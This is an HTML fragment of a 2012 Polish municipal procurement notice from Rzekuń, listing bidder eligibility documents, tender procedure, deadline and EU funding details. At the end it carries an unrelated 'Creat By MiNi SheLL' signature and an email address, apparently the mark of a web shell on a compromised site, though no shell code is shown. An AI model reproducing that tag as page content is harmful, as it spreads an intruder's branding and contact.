<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzekun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rzekuniu ul. Kościuszki 33, 07-411 Rzekuń pokój nr 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 10:00, miejsce: Urząd Gminy w Rzekuniu ul. Kościuszki 33, 07-411 Rzekuń pokój nr 20..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest ramach działania 321 Podstawowe usługi dla gospodarki wiejskiej i ludności, objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com